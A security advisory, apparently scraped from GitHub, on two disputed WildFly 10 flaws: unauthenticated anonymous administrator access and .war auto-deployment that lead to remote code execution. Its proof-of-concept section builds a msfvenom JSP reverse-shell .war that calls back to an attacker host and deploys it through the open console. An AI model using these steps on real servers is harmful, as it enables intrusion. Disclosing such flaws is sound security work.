Permalink
Name already in use
A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
exploit/CVE-2018-10682-CVE-2018-10683.txt
Go to fileThis commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
124 lines (95 sloc)
6.3 KB
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ############################################################### | |
| # | |
| # WildFly Unauthenticated RCE through unprotected deployment | |
| # | |
| ############################################################### | |
| # | |
| # Publication date: May 3rd, 2018 | |
| # Authors: | |
| # Bourbon Jean-marie (kmkz) from Excellium-Services company | @kmkz_security | |
| # Maia Anthony (Piosky) from Excellium-Services company | @Piosky1 | |
| # | |
| # Product Homepage: http://wildfly.org/ | |
| # Source code download: https://github.com/wildfly/wildfly/tree/10.x | |
| # Tested on : | |
| # Name : WildFly Full | |
| # Product version: 10.1.2.Final | |
| # Profile : COMMUNITY | |
| # HAL version : 2.8.27.Final | |
| # Core version : 2.8.27.Final | |
| # | |
| ############################################################### | |
| # WildFly10 Manager Application Deployer Code Execution | |
| # CVSSv3 : 10 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N) | |
| # OVE ID: OVE-20180502-0001 | |
| # CVE ID: CVE-2018-10682 | |
| ############################################################### | |
| # | |
| ############################################################### | |
| # Server Allows -Privileged- Anonymous Authentication | |
| # (through misconfiguration) | |
| # CVSSv3 : 7.2 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N) | |
| # OVE ID: OVE-20180112-0001 | |
| # CVE ID: CVE-2018-10683 | |
| ############################################################### | |
| ## Fixes: | |
| ## No known fix yet | |
| ## Red Hat security do not consider it as security issues. | |
| ############################################################### | |
| I. PRODUCT | |
| WildFly is a flexible, lightweight, managed application runtime that helps you build (amazing) applications. | |
| More information: http://wildfly.org/about/ | |
| II. ADVISORY | |
| In case of using default installation without a security realm reference, a weaknesses chaining permits an attacker to successfully perform remote code execution on WildFly server without authentication. | |
| This was based on the official documentation and permitted to successfully compromised the application server by using too high anonymous rights (administrator) and .war deployment feature | |
| that is enabled by default: | |
| "If either the http interface, the native interface or a remoting connection are difined without a security realm reference then they are effectively unsecured, | |
| in the case of the http interface this means that no authentication will be performed on the incoming connection - | |
| for the remoting connections however we make use of SASL so require at least one authentication mechanism so make use of the anonymous mechanism to allow a | |
| user in without requiring a validated authentication process." | |
| Source: https://docs.jboss.org/author/display/WFLY10/Security+Realms | |
| It occurs when server's administrator perform a quick and dirty installation, which allows remote attackers to conduct unrestricted file upload attacks, and thereby execute arbitrary code, by using the | |
| /console and deployment feature. | |
| Please note that we obtained two different CVE identifier: | |
| 1 - Server Allows *Privilegied* Anonymous Authentication (CVE-2018-10683): | |
| ** DISPUTED **: | |
| NOTE: the Security Realms documentation in the product's Admin Guide | |
| indicates that "without a security realm reference" implies "effectively unsecured." | |
| Our point of view: | |
| Unprotected (no credentials) "anonymous" user that have maximum privilege (CWE-732) in WildFly should not be a feature. | |
| 2 - WildFly10 Manager's Application Deployment Code Execution (CVE-2018-10682): | |
| ** DISPUTED ** | |
| Our point of view: | |
| As for Tomcat .war auto-deployment, the deployment feature on WildFly should not be executed automatically especially for untrusted "anonymous" users. | |
| This issues were discovered during penetration test in customer's infrastructure then tested against multiple servers to validate it. | |
| III. VULNERABILITY DESCRIPTION | |
| Using the previously described misconfiguration, it is possible an attacker to access WildFly administration panel using the TCP 9990 port without any authentification using "anonymous" access (no password) that is automatically created | |
| if there is no security realm reference. | |
| This account that have too permissive access since it result as an administrator's access on the server. | |
| Once logged in, a misconfiguration present by default (auto-deployment) permits anonymous user to deploy malicious .war file since auto-deployment is active by default leading to a remote code execution.. | |
| IV. PROOF OF CONCEPT | |
| Perform a network scan to identify tcp 9990 and 8080 port are open on WildFly server. | |
| If yes, try to connect to it by simply accessing the management console http://target.com:9990/console/ (you should be logged-in using the default "anonymous" account). | |
| Generate a .war that contains your payload: | |
| msfvenom -p java/jsp_shell_reverse_tcp LHOST=<your-ip> LPORT=445 -f war > reverse-shell.war | |
| Go on the "deployments" tab and drop-it in order to push crafted .war file on server, a message box should appear displaying "reverse-shell.war: successfully deployed" since auto-deployment is active by default. | |
| Once automatically deployed, you now can access your .jsp file to execute the connect back payload by simply call the dedicated URL (prepare your listener first ofc): | |
| http://target.com:8080/reverse-shell/reverse-shell.jsp | |
| If you are lucky, it may run using "System\NT Authority" privilege but if not, at leat you have a shell on vulnerable machine ;). | |
| Note: | |
| A project named "wildpwn" with a "Tomcat like" approach (/manager credentials brute force) wrote by Halil DALABASMAZ (@hlldz) was discovered by myself few days ago (a while after the CVE request/assigned) | |
| and could be adapted to easily exploit both CVE-2018-10682 and CVE-2018-10683. | |
| Paper link: https://artofpwn.com/wildfly-exploitation.html | |
| V. RECOMMENDATIONS | |
| Add an authentication mechanism on each administration interface by default and restrict permissions for anonymous user. | |
| Only an admin user should be able to deploy .war file, disable auto-deployment by default. | |
| VI. TIMELINE | |
| January 9th, 2018: Vulnerability identification | |
| January 12th, 2018: First contact with the editor (RedHat Security Team) | |
| May 2nd, 2018: Reply with updated advisory | |
| May 2nd, 2018: CVE request / CVE assigned | |
| May 3rd, 2018: Writeup's publication | |
| May 8th, 2018: Public disclosure | |
| VIII. LEGAL NOTICES | |
| The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. | |
| I accept no responsibility for any damage caused by the use or misuse of this advisory. |